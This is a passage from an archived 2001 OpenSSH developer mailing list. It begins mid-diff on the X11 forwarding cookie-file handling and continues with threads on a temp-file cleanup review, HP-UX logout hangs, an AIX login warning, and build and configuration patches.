user configuration file."); > - return 0; > - } > - if (!options.x11_forwarding) { > - debug("X11 forwarding disabled in server configuration file."); > - return 0; > - } > - if (xauthfile != NULL) { > - debug("X11 fwd already started."); > - return 0; > - } > - > - debug("Received request for X11 forwarding with auth spoofing."); > - if (s->display != NULL) > - packet_disconnect("Protocol error: X11 display already set."); > + int success; > > s->single_connection = packet_get_char(); > s->auth_proto = packet_get_string(NULL); > @@ -1396,33 +1354,12 @@ > s->screen = packet_get_int(); > packet_done(); > > - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > - if (s->display == NULL) { > + success = session_setup_x11fwd(s); > + if (!success) { > xfree(s->auth_proto); > xfree(s->auth_data); > - return 0; > } > - xauthfile = xmalloc(MAXPATHLEN); > - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > - temporarily_use_uid(s->pw); > - if (mkdtemp(xauthfile) == NULL) { > - restore_uid(); > - error("private X11 dir: mkdtemp %s failed: %s", > - xauthfile, strerror(errno)); > - xfree(xauthfile); > - xauthfile = NULL; > - xfree(s->auth_proto); > - xfree(s->auth_data); > - /* XXXX remove listening channels */ > - return 0; > - } > - strlcat(xauthfile, "/cookies", MAXPATHLEN); > - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > - if (fd >= 0) > - close(fd); > - restore_uid(); > - fatal_add_cleanup(xauthfile_cleanup_proc, s); > - return 1; > + return success; > } > > int > @@ -1636,6 +1573,10 @@ > void > session_close(Session *s) > { > + if (s->display) { > + xauthfile_cleanup_proc(s->pw); > + fatal_remove_cleanup(xauthfile_cleanup_proc, s->pw); > + } > session_pty_cleanup(s); > session_free(s); > session_proctitle(s); > @@ -1710,11 +1651,57 @@ > setproctitle("%s@%s", s->pw->pw_name, session_tty_list()); > } > > +int > +session_setup_x11fwd(Session *s) > +{ > + int fd; > + struct stat st; > + > + if (no_x11_forwarding_flag) { > + packet_send_debug("X11 forwarding disabled in user configuration file."); > + return 0; > + } > + if (!options.x11_forwarding) { > + debug("X11 forwarding disabled in server configuration file."); > + return 0; > + } > + if (!options.xauth_location || > + (stat(options.xauth_location, &st) == -1)) { > + packet_send_debug("No xauth program; cannot forward with spoofing."); > + return 0; > + } > + if (s->display != NULL) { > + debug("X11 display already set."); > + return 0; > + } > + xauthfile = xmalloc(MAXPATHLEN); > + strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > + temporarily_use_uid(s->pw); > + if (mkdtemp(xauthfile) == NULL) { > + restore_uid(); > + error("private X11 dir: mkdtemp %s failed: %s", > + xauthfile, strerror(errno)); > + xfree(xauthfile); > + xauthfile = NULL; > + return 0; > + } > + strlcat(xauthfile, "/cookies", MAXPATHLEN); > + fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > + if (fd >= 0) > + close(fd); > + restore_uid(); > + s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > + if (s->display == NULL) { > + xauthfile_cleanup_proc(s->pw); > + return 0; > + } > + fatal_add_cleanup(xauthfile_cleanup_proc, s->pw); > + return 1; > +} > + > void > do_authenticated2(Authctxt *authctxt) > { > > server_loop2(); > - if (xauthfile) > - xauthfile_cleanup_proc(NULL); > } From genco at olympos.gen.tr Fri Jun 8 08:10:42 2001 From: genco at olympos.gen.tr (Genco Yilmaz) Date: Fri, 8 Jun 2001 01:10:42 +0300 (EEST) Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory Message-ID: hi, I am taking an error like this while loging into a AIX 4.3.3 on ssh 2.4.0 WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path name does not exist. is there any one knowing why this happens or do you know anybody who can tell me why it happens ? thanks in advance . From carson at taltos.org Fri Jun 8 08:16:38 2001 From: carson at taltos.org (Carson Gaspar) Date: Thu, 07 Jun 2001 15:16:38 -0700 Subject: HPUX: ssh hangs after shell exit In-Reply-To: <3B1F89D3.6598D9@mail.microcenter.com> Message-ID: <4084520090.991926998@[192.168.1.103]> While discussing this with an HP employee many moons ago, I was told that: - If SA_RESTART is in effect, HP-UX will re-start the select system call (this is perfectly fine POSIX compliant behaviour) HOWEVER - if select is restarted, it resets the timeout start time This is _evil_. If you get signals more frequently than once per timeout period, select will _never_ timeout. There is some HP-UX specific workaround involving extensions to the siginfo structure, if I recall correctly, but I don't know the specifics. -- Carson From nalin at redhat.com Fri Jun 8 10:07:32 2001 From: nalin at redhat.com (Nalin Dahyabhai) Date: Thu, 7 Jun 2001 20:07:32 -0400 Subject: OpenSSH tmp cleanup In-Reply-To: <20010607225233.A21260@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 10:52:33PM +0200 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> Message-ID: <20010607200732.M864@redhat.com> On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote: > did someone check this? The patch appears to prevent the deletion of wrong files, but it still looks to me that if a local user can hit the window between the mkdtemp() and open() calls, he can cause the cookie file to be created in any directory the superuser can write to. Would it be safer to create the directory with superuser privileges, and then change the ownership of the directory to the user's UID after the cookie file was created? The sticky bit set on /tmp would keep a user from being able to play tricks with symlinks.... The post on BugTraq which I saw mentioned that sshd didn't clear its supplemental groups list at startup time. Something like this before the first fork() should fix that: if (setgroups(0, NULL) < 0) if (debug_flag) error("setgroups() failed: %.200s", strerror(errno)); else fatal("setgroups() failed: %.200s", strerror(errno)); Cheers, Nalin From tim at multitalents.net Fri Jun 8 14:57:18 2001 From: tim at multitalents.net (Tim Rice) Date: Thu, 7 Jun 2001 21:57:18 -0700 (PDT) Subject: Unreviewed 2.9p1 patches? In-Reply-To: <20010607061453.J14017@postal.il.thewrittenword.com> Message-ID: On Thu, 7 Jun 2001 openssh-unix-dev at thewrittenword.com wrote: > Anyone get a chance to review the patches we submitted? > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2 Not yet. There are a bunch of build related patches that I have on my peronal TODO list to look at. > > -- Tim Rice Multitalents (707) 887-1469 tim at multitalents.net From Jarno.Huuskonen at uku.fi Fri Jun 8 15:13:25 2001 From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Fri, 8 Jun 2001 08:13:25 +0300 Subject: OpenSSH tmp cleanup In-Reply-To: <20010607225233.A21260@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 10:52:33PM +0200 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> Message-ID: <20010608081325.A226588@messi.uku.fi> On Thu, Jun 07, Markus Friedl wrote: > did someone check this? > > -m [patch snapped] The patch did apply to openssh-2.9p1, and it compiles but unfortunately I haven't had the time to test it yet. Thanks, -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 8 18:40:28 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 8 Jun 2001 10:40:28 +0200 Subject: OpenSSH tmp cleanup In-Reply-To: <20010607200732.M864@redhat.com>; from nalin@redhat.com on Thu, Jun 07, 2001 at 08:07:32PM -0400 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> <20010607200732.M864@redhat.com> Message-ID: <20010608104028.C21817@faui02.informatik.uni-erlangen.de> On Thu, Jun 07, 2001 at 08:07:32PM -0400, Nalin Dahyabhai wrote: > On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote: > > did someone check this? > > The patch appears to prevent the deletion of wrong files, but it still > looks to me that if a local user can hit the window between the > mkdtemp() and open() calls, he can cause the cookie file to be created > in any directory the superuser can write to. how can he do this? we switch to the uid of the user before mkdtemp() and back after the call to open(). From Jarno.Huuskonen at uku.fi Fri Jun 8 19:54:28 2001 From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Fri, 8 Jun 2001 12:54:28 +0300 Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory In-Reply-To: ; from genco@olympos.gen.tr on Fri, Jun 08, 2001 at 01:10:42AM +0300 References: Message-ID: <20010608125428.A92916@messi.uku.fi> On Fri, Jun 08, Genco Yilmaz wrote: > hi, > I am taking an error like this while loging into a AIX 4.3.3 on ssh 2.4.0 > > WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path > name does not exist. > > is there any one knowing why this happens or do you know anybody who can > tell me why it happens ? What exactly are you trying to do ? connect to AIX server(running the commercial ssh 2.4.0) ? How is this related to OpenSSH ? Are you using openssh client and the server error happens only when connecting with openssh-client ? -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi From wooledg at eeg.ccf.org Fri Jun 8 22:22:25 2001 From: wooledg at eeg.ccf.org (Greg Wooledge) Date: Fri, 8 Jun 2001 08:22:25 -0400 Subject: Defect: OpenSSH hangs on logout In-Reply-To: ; from stevesk@pobox.com on Thu, Jun 07, 2001 at 11:42:27AM -0700 References: <20010607092831.D24958@eeg.ccf.org> Message-ID: <20010608082225.F24958@eeg.ccf.org> On Thu, Jun 07, 2001 at 11:42:27AM -0700, Kevin Steves wrote: > stevesk 1611 1609 9 11:33:29 ? 0:00 > root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1 > > the server was blocked in select() when the SIGCHLD was received, and it > was restarted, where it is blocked waiting for input. if you enter one > character it will return and process the sigchld hander flag. Ah! Yes, I've seen that one too -- but I didn't consider it a serious bug because all I have to do is press Enter to get my prompt back. Unfortunately, I don't know of any way to reproduce that one consistently. (And naturally, when I want to test it, I can't make it show up....) From edgy at us.ibm.com Fri Jun 8 23:15:07 2001 From: edgy at us.ibm.com (Edward Geraghty) Date: Fri, 8 Jun 2001 09:15:07 -0400 Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory Message-ID: Hello, I'm going on memory here. I remember seeing this problem when you /etc/security/lastlog file is corrupted. As a test, backup and truncate you lastlog file. Commands similar to: cp /etc/security/lastlog /etc/security/lastlog.saveme cp /dev/null /etc/security/lastlog If this works.. I have no idea what process corrupts the lastlog file.. Good Luck, EdGy Jarno Huuskonen @mindrot.org on 06/08/2001 05:54:28 Sent by: owner-openssh-unix-dev at mindrot.org To: openssh-unix-dev at mindrot.org cc: Subject: Re: WARNING: putuserattr SEC_COMMIT failed: A file or directory On Fri, Jun 08, Genco Yilmaz wrote: > hi, > I am taking an error like this while loging into a AIX 4.3.3 on ssh 2.4.0 > > WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path > name does not exist. > > is there any one knowing why this happens or do you know anybody who can > tell me why it happens ? What exactly are you trying to do ? connect to AIX server(running the commercial ssh 2.4.0) ? How is this related to OpenSSH ? Are you using openssh client and the server error happens only when connecting with openssh-client ? -Jarno -- Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi From abush at microcenter.com Fri Jun 8 23:20:49 2001 From: abush at microcenter.com (Aaron Bush) Date: Fri, 08 Jun 2001 09:20:49 -0400 Subject: Defect: OpenSSH hangs on logout References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org> Message-ID: <3B20D131.5C6BFDA@mail.microcenter.com> Greg Wooledge wrote: > > On Thu, Jun 07, 2001 at 11:42:27AM -0700, Kevin Steves wrote: > > > stevesk 1611 1609 9 11:33:29 ? 0:00 > > root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1 > > > > the server was blocked in select() when the SIGCHLD was received, and it > > was restarted, where it is blocked waiting for input. if you enter one > > character it will return and process the sigchld hander flag. > > Ah! Yes, I've seen that one too -- but I didn't consider it a serious > bug because all I have to do is press Enter to get my prompt back. > > Unfortunately, I don't know of any way to reproduce that one consistently. > (And naturally, when I want to test it, I can't make it show up....) The real danger that i have come across is when doing a scp a defunct process will show up after the copy is complete. Basically you end up with a scp that never returns which is very bad. -ab From dwd at bell-labs.com Sat Jun 9 01:29:29 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 8 Jun 2001 10:29:29 -0500 Subject: Patch to enable multiple possible sources of entropy In-Reply-To: <20010607125014.A15157@lucent.com>; from dwd@bell-labs.com on Thu, Jun 07, 2001 at 12:50:14PM -0500 References: <20010607125014.A15157@lucent.com> Message-ID: <20010608102929.A4439@lucent.com> On Thu, Jun 07, 2001 at 12:50:14PM -0500, Dave Dykstra wrote: > I have a need to have the same OpenSSH binaries run on multiple machines > which are administered by different people. That means on Solaris, for > example, there will be some with /dev/random, some on which I can run prngd > because they'll be installing my binaries as root, and some which will have > neither because they will be only installed as non-root. Below is a patch > to enable choosing all 3 possible sources at compile time, with the > available source selected at run time. If no configure parameters are > given, it will still determine the entropy source at compile time and only > the code for the one type, exactly as it does today. The patch adds a > configure option called --with-builtin-entropy. > > I have tested this in all possible combinations of entropy sources, and on > 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and > unixware1). Argh, there's one minor modification needed for unixware1 (my test there hadn't been complete enough): unix-domain sockets on unixware1 are implemented as named pipes that have to be mode 000, so the call to access(PRNGD_SOCKET, R_OK) doesn't work. Change that R_OK to F_OK; that works on all platforms. - Dave Dykstra From vinschen at redhat.com Sat Jun 9 01:31:49 2001 From: vinschen at redhat.com (Corinna Vinschen) Date: Fri, 8 Jun 2001 17:31:49 +0200 Subject: [PATCH]: Add check_ntsec to ownership/mode tests In-Reply-To: <20010604122554.M595@cygbert.vinschen.de>; from vinschen@redhat.com on Mon, Jun 04, 2001 at 12:25:54PM +0200 References: <20010604122554.M595@cygbert.vinschen.de> Message-ID: <20010608173149.F18483@cygbert.vinschen.de> On Mon, Jun 04, 2001 at 12:25:54PM +0200, Corinna Vinschen wrote: > Hi, > > I have added calls to `check_ntsec()' to the code which checks > for the ownership and modes of identity files and directories. > As you might know, check_ntsec() tests if owner/modes are > supported by the OS (9x/ME=no, NT/W2K=yes), the filesystem > (FAT/FAT32=no, NTFS=yes) and the current Cygwin settings > (ntea/ntsec). My patch wasn't relative to the latest sources. Sorry 'bout that. The below patch now should apply cleanly to the current version in CVS. Corinna Index: auth-rhosts.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rhosts.c,v retrieving revision 1.17 diff -u -p -r1.17 auth-rhosts.c --- auth-rhosts.c 2001/04/12 23:34:35 1.17 +++ auth-rhosts.c 2001/06/08 15:28:28 @@ -228,6 +228,9 @@ auth_rhosts2(struct passwd *pw, const ch pw->pw_name, pw->pw_dir); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(pw->pw_dir)) +#endif if (options.strict_modes && ((st.st_uid != 0 && st.st_uid != pw->pw_uid) || (st.st_mode & 022) != 0)) { Index: auth-rsa.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rsa.c,v retrieving revision 1.32 diff -u -p -r1.32 auth-rsa.c --- auth-rsa.c 2001/06/05 20:25:05 1.32 +++ auth-rsa.c 2001/06/08 15:28:28 @@ -158,6 +158,9 @@ auth_rsa(struct passwd *pw, BIGNUM *clie xfree(file); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes && secure_filename(f, file, pw->pw_uid, line, sizeof(line)) != 0) { xfree(file); Index: auth2.c =================================================================== RCS file: /cvs/openssh_cvs/auth2.c,v retrieving revision 1.61 diff -u -p -r1.61 auth2.c --- auth2.c 2001/06/05 20:25:06 1.61 +++ auth2.c 2001/06/08 15:28:28 @@ -698,6 +698,9 @@ user_key_allowed(struct passwd *pw, Key xfree(file); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes && secure_filename(f, file, pw->pw_uid, line, sizeof(line)) != 0) { xfree(file); -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From nalin at redhat.com Sat Jun 9 02:36:31 2001 From: nalin at redhat.com (Nalin Dahyabhai) Date: Fri, 8 Jun 2001 12:36:31 -0400 Subject: OpenSSH tmp cleanup In-Reply-To: <20010608104028.C21817@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Fri, Jun 08, 2001 at 10:40:28AM +0200 References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> <20010607200732.M864@redhat.com> <20010608104028.C21817@faui02.informatik.uni-erlangen.de> Message-ID: <20010608123631.P864@redhat.com> On Fri, Jun 08, 2001 at 10:40:28AM +0200, Markus Friedl wrote: > On Thu, Jun 07, 2001 at 08:07:32PM -0400, Nalin Dahyabhai wrote: > > On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote: > > > did someone check this? > > > > The patch appears to prevent the deletion of wrong files, but it still > > looks to me that if a local user can hit the window between the > > mkdtemp() and open() calls, he can cause the cookie file to be created > > in any directory the superuser can write to. > > how can he do this? > > we switch to the uid of the user before mkdtemp() and back after > the call to open(). My mistake. I didn't read that part of the patch closely enough, and got confused by the call to restore_uid() in cases where mkdtemp() fails. Never mind. Sorry for the confusion. Nalin From dwd at bell-labs.com Sat Jun 9 03:29:30 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 8 Jun 2001 12:29:30 -0500 Subject: configure --with-catman is supposed to be --with-mantype Message-ID: <20010608122930.A8082@lucent.com> There's a typo in configure.in that's specifying --with-catman as an option but the help message says --with-mantype. Here's a patch. - Dave Dykstra *** configure.in.old Fri Jun 8 13:23:13 2001 --- configure.in Fri Jun 8 13:17:47 2001 *************** *** 1422,1428 **** AC_SUBST(INSTALL_SSH_PRNG_CMDS) ! AC_ARG_WITH(catman, [ --with-mantype=man|cat|doc Set man page type], [ case "$withval" in --- 1422,1428 ---- AC_SUBST(INSTALL_SSH_PRNG_CMDS) ! AC_ARG_WITH(mantype, [ --with-mantype=man|cat|doc Set man page type], [ case "$withval" in From sunil at redback.com Sat Jun 9 04:19:13 2001 From: sunil at redback.com (Sunil K. Vallamkonda) Date: Fri, 8 Jun 2001 11:19:13 -0700 (PDT) Subject: how to specify cipher for ssh client ? Message-ID: Hello, I have: SSH-1.5-OpenSSH_2.3.1p1 I find that this client displays error when I specify (from command line), '-c' [cipher] for SSH1. {for SSH2 looks okay}. Thus, if I specify: ./ssh -v -l user -c des -1 host or ./ssh -v -l user -c 3des -1 host I get error: bad cipher des [des] or error: bad cipher 3des [3des] respectively.... and client immediately exits ! But, this is okay: ./ssh -v -l user -c 3des-cbc -2 host looks fine. Any suggestions ? Thank you, Sunil. From qralston+ml.openssh-unix-dev at andrew.cmu.edu Sat Jun 9 06:20:09 2001 From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston) Date: Fri, 8 Jun 2001 16:20:09 -0400 (EDT) Subject: SSH / X11 auth: needless complexity -> security problems? In-Reply-To: <20010606101118.B18811@faui02.informatik.uni-erlangen.de> Message-ID: On Wed, 6 Jun 2001, Markus Friedl posted the following to Bugtraq: > this feature [placing the X11 cookie file in /tmp] was inherited > from ossh and the reason was: > 1) if $HOME is on NFS, then the cookie travels unencrypted > over the network, this defeats the purpose of X11-fwding > 2) $HOME/.Xauthority gets polluted with temorary cookies. > however, i'm not sure whether the benefit justifies the complexity, > so this feature could be removed from future OpenSSH versions. Please do not remove this feature. On many of the systems I have to access, I am in that exact same situation--my home directory is on NFS, and I most emphatically DO NOT want my X11 cookies stored there. Not only does doing so cause my cookies to cross the wire unecrypted, but if I then su, I can't access the cookies without special pains (because the NFS servers in question all map the client's root to anonymous). In fact, one of the (many) reasons I'm motivated to replace the rest of our ssh.com servers with openssh servers is *because* I'll get rid of ssh.com's "I'll just munge the .Xauthority file in your home directory, mwa ha ha!" behavior. Openssh's behavior is conceptually cleaner, even if the price that is paid for it is careful attention to the creation/deletion of the cookie file (and its containing directory). (There's also no real way I can implement the placement myself. My shell rc file automatically exports a TMPDIR value that it creates on the fly using "mktemp -d", but openssh has to place the cookies file before the shell is invoked...) -- James Ralston, Information Technology Software Engineering Institute Carnegie Mellon University, Pittsburgh, PA, USA From qralston+ml.openssh-unix-dev at andrew.cmu.edu Sat Jun 9 07:36:12 2001 From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston) Date: Fri, 8 Jun 2001 17:36:12 -0400 (EDT) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: My $0.02: I'd like to see this feature. I'm not really concerned with the authorized_keys{,2} entries. Where I think the feature would be a win is with known_hosts{,2}. My known_hosts file currently has 50+ entries, and it's a royal PITA to maintain them. The easiest way I've found to reliably keep files in sync across different machines is rsync-over-ssh. That works great if the granularity of change you're dealing with is a file, because rsync is flexible enough to express conditions like: 1. Only add files that do not exist on the target. 2. Don't overwrite newer files on the target. 3. Delete files that exist on the target but not on the source. But when the granularity of change is the *content* of an individual file, this won't work. All I can tell using rsync is that the files differ. To tell what those differences are, I have to scp the remote file to the local system, diff it, figure out how to reconcile the differences, modify the local version of the remote file, and then scp it back to the remote system. Now repeat this about a dozen times or so. It's a big waste of time, and it's not fun. And yes, this task would be simpler if I could always push my changes out immediately after I make them. But that's not always possible (due to firewalls and depending on whether I'm at work, home, or on the road). And it's not always desirable either: my known_hosts files are not strictly identical across all of the machines I access. (I could, however, express "push-only-if-older-version-exists-on-target" using rsync.) On Sun, 3 Jun 2001, Markus Friedl wrote: > i don't understand why editing a file is hard. i think keeping a > file in sync is simpler than syncing directories, especially > deleting files. It might be simpler for you, but that doesn't mean it's simpler for everyone. On Sun, 3 Jun 2001, Theo de Raadt wrote: > OpenSSH is security software. A lot of you keep asking for more and > more features, and the code keeps growing and growing and growing. > Assuming that the number of lines per bug is a constant, how long > before one of these features which noone uses becomes a hole? You have a good point: it would be unwise to carelessly add additional features to OpenSSH. However, good software grows or dies, and OpenSSH is no exception. Carelessly *refusing* to add additional features to OpenSSH will damage the project every bit as much (if not more so) than carelessly adding additional features, because the former will antagonize more people (including supporters and contributors, both current and potential) than the latter. And in terms of this feature, the complexity added is minimal. Processing the subdirectory shouldn't require special pains, because it exists in the user's ~/.ssh directory. If attacker can create files or directories in the user's ~/.ssh directory, it's already Game Over. The effort required by the OpenSSH developers is also negligible, because Pekka offered to write the patch. (Or at least that was my interpretation; Pekka, please correct me if I'm placing words in your mouth.) I realize opinions may have been somewhat polarized by the resulting almost-flamefest, but I think Pekka's original suggestion had merit. Markus et. al., please [re]consider it. -- James Ralston, Information Technology Software Engineering Institute Carnegie Mellon University, Pittsburgh, PA, USA From deraadt at cvs.openbsd.org Sat Jun 9 07:51:25 2001 From: deraadt at cvs.openbsd.org (Theo de Raadt) Date: Fri, 08 Jun 2001 15:51:25 -0600 Subject: authorized_keys2 directory idea In-Reply-To: Your message of "Fri, 08 Jun 2001 17:36:12 EDT." Message-ID: <200106082151.f58LpQv20587@cvs.openbsd.org> We have already discussed this at length. Sorry. > My $0.02: I'd like to see this feature. > > I'm not really concerned with the authorized_keys{,2} entries. Where > I think the feature would be a win is with known_hosts{,2}. My > known_hosts file currently has 50+ entries, and it's a royal PITA to > maintain them. > > The easiest way I've found to reliably keep files in sync across > different machines is rsync-over-ssh. That works great if the > granularity of change you're dealing with is a file, because rsync is > flexible enough to express conditions like: > > 1. Only add files that do not exist on the target. > 2. Don't overwrite newer files on the target. > 3. Delete files that exist on the target but not on the source. > > But when the granularity of change is the *content* of an individual > file, this won't work. All I can tell using rsync is that the files > differ. To tell what those differences are, I have to scp the remote > file to the local system, diff it, figure out how to reconcile the > differences, modify the local version of the remote file, and then scp > it back to the remote system. > > Now repeat this about a dozen times or so. It's a big waste of time, > and it's not fun. > > And yes, this task would be simpler if I could always push my changes > out immediately after I make them. But that's not always possible > (due to firewalls and depending on whether I'm at work, home, or on > the road). And it's not always desirable either: my known_hosts files > are not strictly identical across all of the machines I access. (I > could, however, express "push-only-if-older-version-exists-on-target" > using rsync.) > > On Sun, 3 Jun 2001, Markus Friedl wrote: > > i don't understand why editing a file is hard. i think keeping a > > file in sync is simpler than syncing directories, especially > > deleting files. > > It might be simpler for you, but that doesn't mean it's simpler for > everyone. > > On Sun, 3 Jun 2001, Theo de Raadt wrote: > > OpenSSH is security software. A lot of you keep asking for more and > > more features, and the code keeps growing and growing and growing. > > Assuming that the number of lines per bug is a constant, how long > > before one of these features which noone uses becomes a hole? > > You have a good point: it would be unwise to carelessly add additional > features to OpenSSH. > > However, good software grows or dies, and OpenSSH is no exception. > Carelessly *refusing* to add additional features to OpenSSH will > damage the project every bit as much (if not more so) than carelessly > adding additional features, because the former will antagonize more > people (including supporters and contributors, both current and > potential) than the latter. > > And in terms of this feature, the complexity added is minimal. > Processing the subdirectory shouldn't require special pains, because > it exists in the user's ~/.ssh directory. If attacker can create > files or directories in the user's ~/.ssh directory, it's already Game > Over. > > The effort required by the OpenSSH developers is also negligible, > because Pekka offered to write the patch. (Or at least that was my > interpretation; Pekka, please correct me if I'm placing words in your > mouth.) > > I realize opinions may have been somewhat polarized by the resulting > almost-flamefest, but I think Pekka's original suggestion had merit. > Markus et. al., please [re]consider it. > > -- > James Ralston, Information Technology > Software Engineering Institute > Carnegie Mellon University, Pittsburgh, PA, USA > From gert at greenie.muc.de Sat Jun 9 08:48:53 2001 From: gert at greenie.muc.de (Gert Doering) Date: Sat, 9 Jun 2001 00:48:53 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from James Ralston on Fri, Jun 08, 2001 at 05:36:12PM -0400 References: Message-ID: <20010609004853.L22709@greenie.muc.de> Hi, On Fri, Jun 08, 2001 at 05:36:12PM -0400, James Ralston wrote: > My $0.02: I'd like to see this feature. > > I'm not really concerned with the authorized_keys{,2} entries. Where > I think the feature would be a win is with known_hosts{,2}. My > known_hosts file currently has 50+ entries, and it's a royal PITA to > maintain them. Now for known_hosts, I tend to disagree - I don't see any compelling reason to exclude hosts from that list. So what we do is just "collect all host keys on one central machine, and distribute the complete file from there". With the keys, it's not that easy, as not everybody has access everywhere. gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From mouring at etoh.eviladmin.org Sat Jun 9 12:02:03 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 8 Jun 2001 21:02:03 -0500 (CDT) Subject: configure patch for Alpha/Tru64 Unix 5.1 In-Reply-To: Message-ID: Thanks, applied. On Wed, 6 Jun 2001, Petter Reinholdtsen wrote: > > I had to apply this patch to configure.in to get configure to run on > Tru64 Unix on Alpha. The RSA test forgot to reset $LIBS. > > (The compile stopped with missing "zlib.h". I'll send more patches if > required. :-) > > diff -ur src-2.9p1/configure.in src-2.9p1-local/configure.in > --- src-2.9p1/configure.in Wed Jun 6 17:15:09 2001 > +++ src-2.9p1-local/configure.in Wed Jun 6 19:06:07 2001 > @@ -683,6 +683,7 @@ > break; > ], []) > done > +LIBS="$saved_LIBS" > > if test ! -z "$no_rsa" ; then > AC_MSG_RESULT(disabled) > @@ -698,7 +699,7 @@ > else > RSA_MSG="yes (using RSAref)" > AC_MSG_RESULT(using RSAref) > - LIBS="$saved_LIBS -lcrypto -lRSAglue -lrsaref" > + LIBS="$LIBS -lcrypto -lRSAglue -lrsaref" > fi > fi > fi > -- > ##> Petter Reinholdtsen <## | pere at td.org.uit.no > O- > http://www.hungry.com/~pere/ | Go Mozilla, go! Go! > From mouring at etoh.eviladmin.org Sat Jun 9 12:12:26 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 8 Jun 2001 21:12:26 -0500 (CDT) Subject: configure --with-catman is supposed to be --with-mantype In-Reply-To: <20010608122930.A8082@lucent.com> Message-ID: Thanks, applied. On Fri, 8 Jun 2001, Dave Dykstra wrote: > There's a typo in configure.in that's specifying --with-catman as an > option but the help message says --with-mantype. Here's a patch. > > - Dave Dykstra > > > *** configure.in.old Fri Jun 8 13:23:13 2001 > --- configure.in Fri Jun 8 13:17:47 2001 > *************** > *** 1422,1428 **** > AC_SUBST(INSTALL_SSH_PRNG_CMDS) > > > ! AC_ARG_WITH(catman, > [ --with-mantype=man|cat|doc Set man page type], > [ > case "$withval" in > --- 1422,1428 ---- > AC_SUBST(INSTALL_SSH_PRNG_CMDS) > > > ! AC_ARG_WITH(mantype, > [ --with-mantype=man|cat|doc Set man page type], > [ > case "$withval" in > From carl at bl.echidna.id.au Sat Jun 9 15:17:46 2001 From: carl at bl.echidna.id.au (carl at bl.echidna.id.au) Date: Sat, 9 Jun 2001 15:17:46 +1000 (EST) Subject: quicky about return code of scp? Message-ID: <200106090517.f595HkTi005407@rollcage.bl.echidna.id.au> A quick grovel through scp.c shows me that main() ends with this : } exit(errs != 0); } Am I correct in assuming that this means that if there's no problems (ie: the scp executes completely, with no errors) that scp's return code is 0? I need to know if a copy has been successful in a perl script, and the easiest way to check is to look at the code. The return code isn't documented in the man page for scp.1 thanks Carl From openssh-unix-dev at thewrittenword.com Sat Jun 9 16:39:44 2001 From: openssh-unix-dev at thewrittenword.com (openssh-unix-dev at thewrittenword.com) Date: Sat, 9 Jun 2001 01:39:44 -0500 Subject: Unreviewed 2.9p1 patches? In-Reply-To: ; from tim@multitalents.net on Thu, Jun 07, 2001 at 09:57:18PM -0700 References: <20010607061453.J14017@postal.il.thewrittenword.com> Message-ID: <20010609013943.A13869@postal.il.thewrittenword.com> On Thu, Jun 07, 2001 at 09:57:18PM -0700, Tim Rice wrote: > On Thu, 7 Jun 2001 openssh-unix-dev at thewrittenword.com wrote: > > > Anyone get a chance to review the patches we submitted? > > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2 > > Not yet. > There are a bunch of build related patches that I have > on my peronal TODO list to look at. Ok, great. I just 